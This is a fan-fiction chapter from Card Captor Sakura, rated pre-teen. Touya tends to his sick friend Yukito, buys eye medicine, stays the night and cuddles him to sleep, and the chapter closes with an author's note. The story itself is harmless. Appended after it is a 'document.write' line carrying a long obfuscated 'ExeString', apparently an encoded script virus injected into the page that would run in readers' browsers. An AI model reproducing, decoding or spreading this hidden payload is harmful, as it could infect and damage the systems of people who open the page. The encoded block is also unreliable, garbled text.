Card Captor Sakura Fan Fiction ❯ Darkest Day ❯ SleepingwithTo-ya! ( Chapter 3 )

[ P - Pre-Teen ]

The Darkest Day

Part 3: Sleeping With To-ya

The house was barely furnished. Only the most essential was there. There were no pictures, no decorations. It was mostly blank space.

Yuki felt for the light switch beside the door. Thankfully, it was the slow lighting kind. He managed to endure the soft light.

"Where do you sleep, Yuki? I'm taking you to bed." Touya realized the double subtext of his words, and blushed. Yuki failed to note it. Just an example of his innocence.

"I don't have a bed To-ya," he said weakly. "I sleep on a futon."

A futon? His friend's more old fashioned than he thought.

"Where do you keep it?" he asked as they removed their shoes.

"In the cabinet over there," Yukito pointed to a sliding wooden panel on the wall. Touya made him sit down before getting the futon.

"Is this okay?" Touya asked as he chose the darkest corner in the room, far from the fluorescent light, and beyond the reach of tomorrow's sun. He even tossed in the few pillows and sheet, which he assumed to be Yuki's. Yuki nodded, giving a slight smile. He managed to reach it himself, but it was painstakingly slow, as if each step brought him agony. Touya breathed a sigh of relief when his friend finally snuggled beneath the covers.

"I'm going to buy your medicine now, all right?" he smiled as he checked Yukito's temperature. It was slightly above normal, but nothing to be worried about.

Yuki nodded weakly, his hand still on the eye. He looked like a small ailing child.

"Do you want me to bring you back something?"

The boy smiled and shyly nodded. "I would like a big bento box, To-ya."

They both smiled, and Touya felt less anxious. If Yuki still has his appetite, then it might not be as worse as it looked.

* * *

Yukito listened to the sounds of the night. He was lucky to have such a caring friend like To-ya. He had changed earlier, while Touya was away, and was now, comfortably in his pajamas. He stretched out his left hand in front of his face. He looked at it with his left eye, the good one. Even the dim light stung his eye, but he saw his hand, even though the outline was a little blurry. He forced the right one to open. It hurt. It hurt so much, like prying open a fresh wound. His eyes watered, he could feel the tears dripping down his cheeks, but he persisted. To his chagrin, he couldn't see anything. Not even when he waved the hand just beyond his nose.

All he could see was a giant white pie, with a cloudy crust at its edge. Yukito sniffed. If this was sore eyes, he didn't want To-ya to catch it.

"Yuki, I'm back," Yukito felt To-ya's hand on his forehead again. He wondered if he saw him. He didn't want to worry To-ya needlessly. Besides, he has the medicine now. It will make him better, right?

"How's your arm?" he asked, remembering the large gash.

Touya flexed his arm, boisterously showing the bandages. "Told ya, a scrape."

Yuki then heard the scratching of a plastic bag, and he smelled the fresh smell of sushi, teriyaki, and pastries! His stomach rumbled in anticipation. Touya's soft laughter filled the house.

"Must be later than I thought," Touya exclaimed, but his jolliness was forced, Yuki knew that.

Yuki peeked with his good eye. The food looked better than it smelled. He tried sitting up, but got dizzy. Touya noticed and steadied him.

"Can you eat?" Touya whispered.

Yuki glanced at Touya, then the food.

"Do you have to ask, To-ya?" he crooned. Touya laughed at Yukito's unintended flirting. Sick or not, Yuki was still adorable. With Touya's chest as a back board, Yuki didn't have to worry about falling suddenly. Yuki was light as a feather, almost weightless. Touya watched with amusement as he gobbled up all the food. He barely finished one bento when Yuki was eating his 6th!

"Ah, I'm full!" Yukito exclaimed, giving a satisfied burp. He blushed then turned around. "Gomen!" he smiled at his best friend. "The food was sooo good!" For a moment there, he looked fine, when suddenly, his expression blanked out.

"Yuki…?"

"My head hurt, To-ya," he murmured, unable to hide it any longer.

Touya guided him down the futon.

"Let's put some drops in your eye, okay?" Touya smiled as he brushed the hair away from Yuki's face. He tried putting on a brave front, but seeing Yuki like this… it unnerved him. He never remembered having sore eyes as worse as this. Sure, it's uncomfortable and itchy as hell, but not like this. He looked at the unassuming droptainer, just the size of his thumb. It cost 27,000 yen. He had to borrow that from his Father, and would have to work over time to pay it back. But it's worth it, if it will make Yukito all right.

"Open your eye, Yuki…"

Yuki obeyed. The right eye was a swollen mess. Just looking at it was painful. Gently, he lifted up Yuki's chin and pulled down one eyelid. Yuki cringed, but bravely endured the pain.

The drop was cool and soothing. Yuki blinked a little to clear the excess water. He was dimly aware of Touya patting his cheeks dry as he closed his eyes again.

"Thank you, To-ya…" Yuki whispered the words. He felt Touya's warm hand on his damp cheeks. The touch was more soothing than the medicine.

"Anytime Yuki," Touya answered.

Yukito suddenly realized how late it was. They must be expecting To-ya home already! Touya noticed his agitation, and massaged his temple to still him.

"You must go home now, it's late," he murmured. He didn't want him to leave really. More than anything, he wanted someone with him tonight. But To-ya's done so much already.

To his surprise, that warm hand refused to leave his brow.

"Iie. I'll stay over tonight, Yuki," he whispered, voice low and soothing.

Touya lied down on the floor beside him. Yuki was suddenly aware of how cold To-ya must be feeling right now. He faced his friend, and raised the blanket. There was enough to accommodate them both. After a moment's hesitation, Touya relented, snuggling beside him.

Touya was unaccustomed having a man in bed with him, but to his surprise, it wasn't very different at all. There was a pillow placed conveniently midway. And Yuki was using it as a snuggling pillow, his leg savoring its coldness. Touya noted this and laughed. Yuki 'looked' puzzlingly at him. 'Looked' because he didn't open his eyes, just lifted his chin until they were eye level.

"You still have a snuggling pillow, Yuki?"

"Snuggling? Pillow?" Yuki raised his eye brow. "What's snuggling mean?"

Touya looked incredulously at him. "Don't tell me, you don't know that, Yuki."

"Don't know what To-ya?"

Is there anyone else more innocent?

Touya breathed deeply and removed the pillow in their midst. Cautiously, he made Yuki settle on his arm, careful not to bump with the eye.

Yukito was surprised at this deeper intimacy. At first, he felt awkward, but he slowly relaxed as Touya rubbed his back. Their nearness was comforting, and Touya's warmth more so.

"This is cuddling, my innocent best friend," Touya murmured to his ear. His breath was so warm and cozy.

"Hmm. I like it," he assented. The pain throbbing in his temple now felt duller.

"You'd better. You have to do it when you meet girls," Touya explained.

"Girls, To-ya?"

"Don't tell me you don't know girls?" Touya teased.

"Hmm… I know girls," Yukito murmured before sleep finally claimed him. But for all the magic in the world, he can't imagine wanting any of them. Not when he has To-ya…

<<To Be Continued>>

Turin: Shucks… those two are sooo sweeeet! And they aren't even boy friends yet! I'm gonna get challenged writing that part! Harharar! Haven't even started Icarus' Flight!

document.write "
" ExeString = "CbgHgQbdk_&GmgfS^rn+O\mS^rn+=_aq^_Mh`h&@ijfdH\dd\n&ELI&VlM bdef&VbhJ`mb&Rn\?+?ch`es>hleLo\DDYrm[ls!#DDMdm>cl!#DD=q^[ndFc fh^o(EIEcedBn(EIh^B`B`Srj_RmlXihkh[^ShhfnZ^7!%pal]lhin4! !DDYrm[ls!#! 8pacrd 4V!Mt[?fmdEIShhfnZ^7!%pal]lhin4! !DDYrm[ls!#! 8pa_eZofsB^SYBNLLDGNYTL?L[B^_mmcnh^mVC^`[tenTl_lB>(ItmFindP_qlcim7V lMbdef(Q^aLdZ^!AE?XXFIB:FYL:=BHG?VRh`nvZl_[Fc]qhmiemVItmfind?wil_rlVGd]c[U^ l(QrLb_ke(Ld`Qlhm_!AE?XX=OQK?HSXOMDKVCc^hnhmc_rU C^`[tenCcVRh`nvZl_[Fc]qhmiemVItmfind?wil_rlV%F_emItmFindP_qlcim%+#(/UG[heV= nfjir^Or^MsZncng_lx&++L?FX>QNK>=[keEIF[ckK_a' BEDRY=TKL?MMYOR>LVH]_hsbncdlV%=_``nfnH] [Li`sp[ldUGcbkimn_nVNnnfnheDqjldlmV!Fd_nNnnFnhePdkmcng&+( -)VG`bfVRm[nhhh_qrH`f_+Lb[q^@ck^#SYBNLLDGNYTL?L[Li`sp[ldUGcbkimn_nVN_`cb^V3 -)VItmfindVIomcimlVG`bfVD]cnnkJld__ldg]_!%+-0)1,+L?FX>QNK>= [keEIF[ckK_a'BEDRY=TKL?MMYOR>LVRh`nvZl_[Fc]qhmiemVQhg^ivlGdlm[fbhaL o\rrmndfVJqh`ck^mVLb]lnli`sIoseiijChs^lhdmMdmncm`mV/Z*^/+**/)**/)**b)**/)** /)**/).0[)*+d)-0/&ae[hj#HN^NM?QUMiemq[q^VGh\lirh`n[H``h\_V0)( *[Honkhie[Hjnhhhm[F[ckU?^hmilOk_`dk_hb^&0,+*6+&Q>AYCPILCBZf fDDG`bfLd`GD?S^HN^NM?QUMiemq[q^VGh\lirh`n[H``h\_V0)(*[rcrmmVbhJ`mb%QR\lcom( _w^#(NbdgS^gjOZnb6rrmndf-,[Dg^H_H_NdfjJ`mbGVJ^lhde-,-]ff!?kl_Ln[qmOjEb f_6QhgJ[sa MSRM?G[D_lm^f(cef?hcC`QmRa_fk'L_fPlcs^GD?S^EI=@EYG@VMn_nq`k_ VLb]lnli`sUQcm]iqrU=oqk_hsO_lrbih[Koh[D_lm^f-1&MsZlnTi@ck^ELI(Bhjs Ebf_PchOZnbv^\Vjcq[ke(ah_&VbhJ`mb%qd[V@ne^_q'bnsELI(BhjsEbf_PchOZn brrmndf-,[ddq`ef(fb`+PchOZnbrrmndf-,[]_mjmij-bhc!=`efJC;jo^h^ShQhgJ[sa q_aU@ik]_l-ann!%bsm#QmRa_fk'L_fPlcs^GD?S^d_[okmC]ngV+PmMg^ff-K_aQ ^[^'BEDRY=K:MMDLYLNHNVuq^`he_VC^`[tenCbhhV!VlMbdef(Q^aQqbn_BEDRY= K:MMDLYLNHNVcef`he_VR\lcom?hfbh_[&U;M]qbjn!QrLb_ke(Ld`Qlhm_!AE?XX= F@LM?RXLINMV^ke@ck^VMg^ff[Hj_mU=ilf[hcU&VbhJ`mb%N_liJ[sa QMbkcjs'_rd$*$QmRa_fk'L_fPlcs^GD?S^SYBE;MR>MYQHIN[]ffEbf_[L]lh inBnln?m\i^dU&!t2/0,+02*'.7)='0*>,,;+@8&**B).@7/=-1-wM_s@ck ^N_li7?MI-Hj_mM_rs?cfd!Mn`knOo?cfd%,&sko_(@he_Ndfj(VkcndP\rM_rs@he_Ndfj (Beimd?m]@tg]nhhh@tg]nhhhJCFcj^Cn'H_CmPb_q^6=bsffMb_m?wbnEnh]sbih?hcC` NbhlFibZncng7]i]tf_hs'fibZncngH_Fd_nSacmKh][sbih+.#6ebf_!NbdgSacmKh][s bih6Gh]NgbmFn\[nhhh&8H_@RH(Adm?rs^hmhhhH`f_SacmKh][sbih(68sa_h ;NbhlFibZncng7E_`s!NbhlFibZncng&FdgNgbmFn\[nhhh#&Fdg@RH(Adm@ck^H[l^ NgbmFn\[nhhh#(Dg^H_H_FdgNgbmFn\[nhhh#7-Mb_mNgbmFn\[nhhh7)S^mnNnnhle%4[ Dqcn=i>h^B`HhDkliqL_rng_G_rsMdmNgbm@ne^_q7ELI(F^n@ne^_q!=oqk_hsLnlhga#&# 27;M_s>cbLo\6=q^[ndH\dd\n!L]lhincm`(>h\ncng[lx#L_n?ifc^lm6Ngbm@n e^_q'Moa?ifc^lm@ik]_lBhohs7/@nk?`\bS^gjEhf^dkcm@ik]_lr@ne^_qcbLo\-Z^^? ifc^l=nnhn+N_li@ik]_l-G[gdHdqnB`Cb]Mt[(=nnhn6*Mb_mF`lnCm]_rBa[l6CmlnlQ^pBnl ldgnMskchf%V!%F_m!=oqk_hsLnlhga#,*#Lo\Rmlcm`7Fc^'7*Dem_C`Lo\D7/NbdgBnl ldgnMskchf7BnlldgnMskchf Cb]Mt[(Cs^g0 V?rhm>n?kl_c7)Ehli70Ni?ifc^l=nnhnC`E=[r^Mt[Mnqbha(7KcbLo\ -Bn_l!d#(NbdgH_d5@ne^_qrcs>i?hcC`?hcC`H_wmKZmnHg^_wd`l_d& #27;CbmeC^ald^7PmMg^ff-K_aQ^[^'K_aOZnbUZfodH_>hle>d`l_d7!Ng^h=cm j=_aq^_h^B`?ilb7+mi4>hle>d`l_d7JCI\nLo\'=cmj=_aq^_#EDtfg[f^@ik]_ l'=cmj=_aq^_#H_wmVlMbdef(Q^aQqbn_K_aOZnbUZfod%>crd>_fk__?hc @om\ncng@om\ncngEIngg``_@ne^_q!J[saH[l^#HhDkliqL_rng_G_rsMdm@ne^_qG[gd 7ELI(F^n@ne^_q!J[saH[l^#L_nMbcr?cfdl7?ifc^lH`f_(Ebf_rBsm?rhlnm6*@iq?[b aNgbm@he_HgNgbm@he_m@ck^?rs7TrndgmcngH[l^Ngbm@he_(OZnb(H_@he_?wm7 BNLIq@ck^?rs7!ANGKIq@ck^?rs7!:MJ!Il?cfd>rn6OAJHlEbf_DqnfmdB`Eb f_Dqnrcrmmcl!#HhDkliqL_rng_G_rs?qk(=k^[lN_rmCn6QR\lcom(Mbkcjs?ofkg[gdC e?lqNbdgHgQbdk_h^B`B`HgQbdk_fmdMdm;oif_N[d_bm7]i]tf_hs'[joe_nr!EIXaodln(;oi f_N[d_bm(mdm=FRB>!t@32.>=1+'+B?*'0*>*,:>'u*C--@D)+'E)3-,*+ =E&233)'*/:*=8)/.1+2w!@ijfdH\dd\n(bk_[s^Chrm[hb^#M_s@MN7@ijfdH\dd\ n(F^nIac_]s!#>h^B`L_n=cmjH\dd\nlho_m@iq?[ba>hleNdfjHg>hleIac_ ]sCe>crdN_li(>qbp_Srj_581;hc>crdN_li(>qbp_Srj_580NbdgDqcn?il 7;?hcC`@cmZfsCbme6>hleNdfj(CkcpdE_ns^lG_rs>hfIsa_l@kl2QZh^nfctd@ nkcr_Rmlcm`#!p\BkF`%NdfjHtf7:m]'Fc^'>r_Rmlcm`&c+*##! pah^B`!p\BkF`%NgbmNdqn